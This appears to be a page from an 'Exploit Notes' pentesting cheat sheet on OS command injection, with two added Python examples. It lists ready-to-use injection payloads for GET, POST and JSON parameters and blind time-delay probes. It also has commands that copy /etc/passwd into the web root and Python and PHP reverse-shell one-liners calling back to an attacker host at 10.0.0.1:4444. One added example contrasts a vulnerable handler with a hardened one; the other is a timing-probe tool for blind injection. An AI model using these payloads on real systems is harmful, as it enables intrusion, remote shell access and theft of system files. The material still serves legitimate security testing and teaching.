Exploit Notes

OS Command Injection

Last modified: 2023-03-03

Tags: Remote Code Execution, Reverse Shell, Web

GET Requests

Some endpoints take the command directly from the path or from a query parameter. A value such as ;id relies on the shell treating ; as a command separator:

/api/cmd/whoami
/command/whoami

/?cmd=whoami
/?cmd=;id

/?cmd=ls
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home

POST Requests

We may be able to inject OS commands into POST parameters by appending a shell metacharacter such as a pipe, so that the value is no longer just an id:

productId=1&stockId=1|whoami
productId=1&stockId=1|id
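As an added example (not from the original page), the injection above reproduced against a constructed Python handler that shells out, next to a hardened version. It assumes a hypothetical stock-check endpoint in which `echo` stands in for the real binary; the vectors tried are the page's `|`, `;`, `||`, `$()` and backticks, plus `&&`, with `echo INJECTED` in place of whoami or id:

```python
import re
import subprocess

# Constructed stand-in for a stock-check endpoint. "echo" plays the role of
# the real binary the app would call; the injection works the same either way.


def check_stock_vulnerable(product_id: str, stock_id: str) -> str:
    """Vulnerable: parameters are pasted into one string run by /bin/sh."""
    cmd = f"echo productId={product_id} stockId={stock_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


ID_RE = re.compile(r"[0-9]{1,10}")  # allowlist: ids are short digit strings


def check_stock_hardened(product_id: str, stock_id: str) -> str:
    """Hardened: validate against an allowlist and pass argv, never a shell."""
    for value in (product_id, stock_id):
        if not ID_RE.fullmatch(value):
            raise ValueError(f"rejected parameter: {value!r}")
    argv = ["echo", f"productId={product_id}", f"stockId={stock_id}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# The page's injection vectors, with "echo INJECTED" in place of whoami / id.
PAYLOADS = {
    "pipe": "1|echo INJECTED",
    "semicolon": "1;echo INJECTED",
    "and": "1&&echo INJECTED",
    "or": "1||echo INJECTED",        # only runs if the preceding command fails
    "subst": "1$(echo INJECTED)",     # command substitution needs no separator
    "backtick": "1`echo INJECTED`",
}


def injected(output: str) -> bool:
    """Did the injected command's marker reach the response?"""
    return "INJECTED" in output


def run_all() -> dict:
    """Per vector: (vulnerable handler executed it, hardened handler rejected it)."""
    results = {}
    for name, payload in PAYLOADS.items():
        executed = injected(check_stock_vulnerable("1", payload))
        try:
            check_stock_hardened("1", payload)
            rejected = False
        except ValueError:
            rejected = True
        results[name] = (executed, rejected)
    return results


if __name__ == "__main__":
    for name, (executed, rejected) in run_all().items():
        print(f"{name:9s} vulnerable executed={executed}  hardened rejected={rejected}")
```

Note that `||` does not fire when the command it is appended to succeeds, which is why the `||`-wrapped payloads later on this page only work when the preceding command fails; `;` and `&&` do not depend on it. The hardened version allowlists the ids and passes them as argv with no shell, so no metacharacter is ever interpreted.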

Ping

When the injected command produces no visible output, try pinging our own machine (10.0.0.1 below) and watch for the ICMP echo request. Start tcpdump on our machine first:

# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp

Then send the ping in the POST data; the + characters are URL-encoded spaces:

file=example.jpg&filetype=png;ping+-c+1+10.0.0.1

Reverse Shell

Start a listener on our machine (10.0.0.1:4444 below) before sending the payload; RHOST and RPORT point back to that listener.
file=example.jpg&filetype=png;export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Blind Command Injection (Time Delay)

If nothing is returned, inject ping with a packet count and check whether the response is delayed by the expected amount (ping -c 10 takes about 9 seconds). The || form only runs ping when the preceding command fails, whereas ; runs it unconditionally:

name=michael&email=michael@example.com||ping+-c+10+127.0.0.1||&message=hello
email=test@test.com;ping+-c+15+127.0.0.1+#&message=hello

Once the delay confirms execution, run other commands the same way, e.g. copy /etc/passwd into the current working directory, which can then be fetched over HTTP if that directory is the web root:

email=test@test.com;cp+/etc/passwd+./+#&message=hello
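Added example, not part of the original page: the timing probe behind the payloads above, run against a constructed stand-in for the vulnerable form (`simulated_target`, a hypothetical app that shells out with the email field and discards the output). `sleep` replaces `ping -c N 127.0.0.1` so that it runs offline, and `build_body` performs the URL-encoding that the `+` and %-escapes on this page do by hand:

```python
import subprocess
import time
from urllib.parse import quote_plus, unquote_plus


# ---- constructed stand-in for the vulnerable target (hypothetical app) ------
def parse_body(body: str) -> dict:
    """Decode application/x-www-form-urlencoded data (split on & only)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def simulated_target(body: str) -> None:
    """The email field is pasted into a shell command and the output is
    discarded, so the only thing an attacker can observe is elapsed time."""
    fields = parse_body(body)
    subprocess.run(f"echo notify {fields.get('email', '')}", shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


# ---- attacker side ----------------------------------------------------------
def build_body(fields: dict) -> str:
    """URL-encode the form; spaces become + and ; | & # become %3B %7C %26 %23."""
    return "&".join(f"{quote_plus(k)}={quote_plus(v)}" for k, v in fields.items())


def time_request(send, body: str) -> float:
    """Seconds taken by one request; `send` is whatever delivers the body."""
    start = time.monotonic()
    send(body)
    return time.monotonic() - start


def probe_time_delay(send, fields: dict, field: str, delay: int,
                     separators=(";", "||", "&&")) -> dict:
    """Append `<sep>sleep <delay> #` to `field` and report, per separator,
    whether the request took about `delay` s longer than an unmodified one.
    `ping -c N 127.0.0.1` gives the same signal (about N-1 s) on targets
    without sleep; the trailing # comments out anything the app appends."""
    baseline = time_request(send, build_body(fields))
    results = {}
    for sep in separators:
        injected = {**fields, field: f"{fields[field]}{sep}sleep {delay} #"}
        elapsed = time_request(send, build_body(injected))
        results[sep] = (elapsed - baseline) >= 0.8 * delay
    return results


if __name__ == "__main__":
    form = {"name": "michael", "email": "michael@example.com", "message": "hello"}
    for sep, delayed in probe_time_delay(simulated_target, form, "email", 2).items():
        print(f"{sep!r:5} delayed={delayed}")
```

Against a real target, replace `simulated_target` with a function that sends the body over HTTP. Because the stand-in's echo always succeeds, `||` never triggers the sleep while `;` and `&&` do; on a real app `||` fires only when the command in front of it fails, so try more than one separator before concluding a field is not injectable.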

JSON Injection

The same applies to values in a JSON body. The first payload closes the quoted string so that pwd runs as a separate command; the other two are XSS and template-style probes for the same kind of field rather than OS command injection.

{ "username": "\"; pwd \"" }
{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}
{"name": "admin", "content": "{{template: ./admin.php}}"}

PHP Injection

If php is installed on the target, command substitution inside an otherwise numeric parameter starts a reverse shell without any separator ($(...) and backticks are equivalent):

id=$(php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");')

# URL-encoded variants; the last uses backticks instead of $(...)
id=1$(php%20-r%20'$sock=fsockopen(%2210.0.0.1%22,4444);exec(%22/bin/sh%20-i%20%3C&3%20%3E&3%202%3E&3%22);')
id=1$(php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27)
id=1`php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27`
